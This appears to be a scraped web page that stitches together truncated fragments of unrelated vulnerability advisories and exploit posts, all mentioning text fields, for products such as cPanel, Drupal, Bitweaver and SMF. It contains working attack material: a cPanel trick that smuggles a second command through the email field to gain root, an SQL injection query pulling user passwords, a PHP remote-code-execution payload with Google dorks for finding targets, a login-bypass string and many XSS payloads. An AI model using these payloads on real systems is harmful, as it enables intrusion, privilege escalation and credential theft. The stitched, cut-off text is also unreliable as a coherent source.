
text field

Cpanel all version >> root access with a reseller account.

example :
http://domain:2086/scripts/wwwacct  [domainname] [username] [password] [Email address] lab lab lab
It means you got access to wwwacct in the scripts folder (Th3 r00t),
so you can run other commands with root access like that:
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
You can likewise run it in the web-based program. What you need to do is just write ali@hackerz.ir;./home/hackerz/public_html/do.pl in the Email text box when you want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1


Firefox 2.0.0.11 INPUT Denial Of Service

-->
<html>
<head>
        <title>die</title>
        <style type='text/css'>
        .textbox 
        {
                padding: 2px 3px;
        }
        </style>
</head>

ZDI-10-069: Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-069
April 13, 2010

-- CVE ID:
CVE-2010-0479

-- Affected Vendors:
Microsoft


Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability

=> XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)

The 'explanation' parameter is not properly sanitized when adding new

    * single-line textfield
    * multi-line textfield
    * checkbox
    * list selection
    * freeform list
    * URL

[SECURITY] [DSA 1778-1] New mahara packages fix cross-site scripting

CVE ID         : CVE-2009-0664


It was discovered that mahara, an electronic portfolio, weblog, and
resume builder, is prone to cross-site scripting (XSS) attacks because
of missing input sanitization of the introduction text field in user
profiles and any text field in a user view.


The oldstable distribution (etch) does not contain mahara.


XSS - NEXTGEN GALLERY 0.96 WORDPRESS PLUGIN

—————————————

Description:

This vulnerability can be exploited by writing malicious (or not) code
in the description textbox

link: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=[galleryID]&_wpnonce=0b3c0996ed

In the description textbox write the text:

Dlink Di-604 router authenticated user ping tool Xss and DoS

network management controls to give you quite possibly the most
advanced, yet affordable Ethernet router to date.


[Bug Description]
'Ping tools' web interface does not validate the ip textfield size
leading to a Denial Of Service flaw by changing its size and sending
more than 500 characters to it. This textfield is also prone to Cross
Site Scripting. An authenticated user is required to exploit these
security flaws.


Hacktics Advisory Dec09: Oracle eBusiness Suite - Multiple Vulnerabilities Allow Remote Takeover

* For earlier versions, injecting a simple <SCRIPT> suffices:
     <SCRIPT>alert('XSS')<SCRIPT>

* Some versions limit the permitted characters, and thus require the tester
to insert JavaScript without utilizing tags, by injecting a script into the
text box as follows:
      ");alert('XSS');//

* Later versions appear to also enforce server-side length restrictions on
the vulnerable parameters. As a result, multiple separate injections are
required to achieve script execution, such as:

Stored and Reflective XSS in Yaws-Wiki 1.88-1 (Erlang)

http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to XSS. This is the "text" post variable:
<script>alert(1)</script> 



VistaReseller Panel BETA Xss Vulnerability

# Xss Address : http://Example/panel/index.php?option=forums
# Variable : [resellerdomain]
######################################
# How Work With it :
# Login In VistaReseller Panel And Open Url
# Insert http://"<script>alert('xss')</script> in Text box and click (Add) Button .
# Now Open the Url Again & See xss msg
######################################
# Solution : Edit Source Code And Filter Variable With htmlspecialchars() function .......
######################################
# Khashayar Fereidani Email : irancrash[at]gmail[at]com

IBM Rational ClearQuest Web Multiple XSS Vulnerabilities

VULNERABLE VARIABLES:
=====================
contextid   (query string parameter)
schema      (query string parameter)
userNameVal ("User Name" text box)

POC URL: http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//

VULNERABLE VARIABLE:
====================

[HACKATTACK Advisory 20081016] WEB//NEWS SQL Injection and Cookie Manipulation

1.1 PoC:
============
http://localhost/webnews/search.php?

Postdata:
1. An attacker has to input a keyword into the keyword textfield. This is required for successful exploitation.

2. An attacker will post the following SQL statement to the categorie id field:

') union select 1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from wn_user where userid=1/**


CORE-2008-0103: Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass

- -----------/

* Disabling the MHTML protocol handler. To disable the protocol handler,
follow these steps:

1. Click Start and then click Run. Enter regedit.exe in the text box and
click OK.
2. Navigate to
HKEY_CLASSES_ROOT\CLSID\{05300401-BCBC-11d0-85E3-00C04FD85AB4}.
3. Right click {05300401-BCBC-11d0-85E3-00C04FD85AB4} and select
Permissions.

[USN-837-1] Newt vulnerability

necessary changes.

Details follow:

Miroslav Lichvar discovered that Newt incorrectly handled rendering in a
text box. An attacker could exploit this and cause a denial of service or
possibly execute arbitrary code with the privileges of the user invoking
the program.


Updated packages for Ubuntu 6.06 LTS:

Liferay Enterprise Portal multiple XSS

Vendor Site: Liferay.net
Version affected: Liferay Enterprise Portal 4.3.1 
Demo: http://www.liferay.net/c/portal/login?tabs1=forgot-password
Class: Input Validation Error

Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New Password" button.

Examples:
1."><script>alert('xss')</script>
2.<html><b>XSS</b></font></html>
3."><iframe>

Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit

    You need an user account and you need to change your "display name" in:
     
    {php}passthru($_SERVER[HTTP_CMD]);{/php}
     
    Register and click on Preferences, look at the "User Information" tab, inside the
    "Real name" text field write the code above, then click on Change.
     
    Google dorks:
    "by bitweaver" Version  powered +boards
    "You are running bitweaver in TEST mode"|"bitweaver * White Screen of Death"
     

PhpGedView login page multiple XSS

Vendor Site: http://www.phpgedview.net
Version: 4.1
Common Path: yoursite.com/genealogy/login.php

Overview: Genealogy program which allows you to view and edit your genealogy on your website. It fails to sufficiently sanitize user-supplied input data in "User Name" text box leaving password blank and pressing the "Login" button, also web address XSS. 

Example:
1.<html><font color="Red"><b>XSS</b></font></html>
2.yoursite.com/genealogy/login.php?login.php?action=login&username="><iframe>
3.yousite.com/genealogy/login.php?url=/index.php?JOSH="><iframe>

Abledesign Dynamic Picture Frame XSS

Vendor Site: http://abledesign.com/
Version affected: ???
Demo: http://abledesign.com/demo/pframe.php
Class: Input Validation Error

Overview: Dynamic Picture Frame is a PHP script which allows you to add a variety of picture frames of any size to images on your website. Dynamic Picture Frame fails to sufficiently sanitize user-supplied input data in "Image URL" text box by pressing the "submit" button. 

Example:
1.<html><font color="Red"><b>XSS</b></font></html>



SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani

|| Note :

To use this vulnerability you need access to the censor words panel.
1. First log in and go to: http://site/path/index.php?action=postsettings;sa=censor
click on "Click here to add another word." to add a new row.
set new text box : ircrash => "<script>alert('Vulnerable')</script>
and save the page.
2. Open a new topic and set the title: ircrash, fill in all fields and post the topic.
3. Open the forum home page. You see the alert: Vulnerable

You can set any HTML or JavaScript code. Hackers can deface the forum home or set ActiveX for a virus.

phpList Improper Access Control and Information Leakage vulnerabilities

(where VALID_UID is a valid user uid, and ID is the id of the message we 
want to forward)

here, regardless of the mailing list to which the specified uid is 
registered, a text field is shown, allowing a malicious user to enter an 
email address for receiving a copy of the message #ID

2) Any unauthenticated user can read the subject of any message sent by 
the system just by iterating on mid and setting randomly an uid; e.g.:


Context IS Advisory - Autocomplete Data Theft in Mozilla Firefox

------------
A malicious web page can extract all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right-arrow keys; then the contents of the autocomplete popup can be read. This may include the search history box within the browser, or other personal details.

Analysis
--------
A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g. 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the popup can be selected by using the up/down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.

In Firefox, a web page can use the 'createEvent' and 'initKeyEvent' JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup. 

However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right-arrow keys, it can systematically grab each entry in the drop-down box. 


Engeman - SQL Injection Vulnerability (vendor url erratum)

Engeman is a Brazilian software for maintenance control.

Version tested: 6.x.x and prior. Next versions appear vulnerable too.

The attacker can inject SQL code in the username textbox:

SQL dump after injection:

select nome,senha,diasexp,dataltsen,permitetroca from cfgusr where nome='NULL' OR NOME<>'1'


[security bulletin] HPSBGN02577 SSRT100224 rev.2 - 3Com OfficeConnect Gigabit VPN Firewall (3CREVF100-73), Remote Cross Site Scripting (XSS)

RESOLUTION

HP has made an update available to resolve the vulnerability. The update can be downloaded from http://www.3com.com/swd/jsp/user/downloadsindex.jsp

Note: In the "Product Number or Name Search" text box, enter "3CREVF100-73" and click "Go".

Product
 Filename
 Version




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
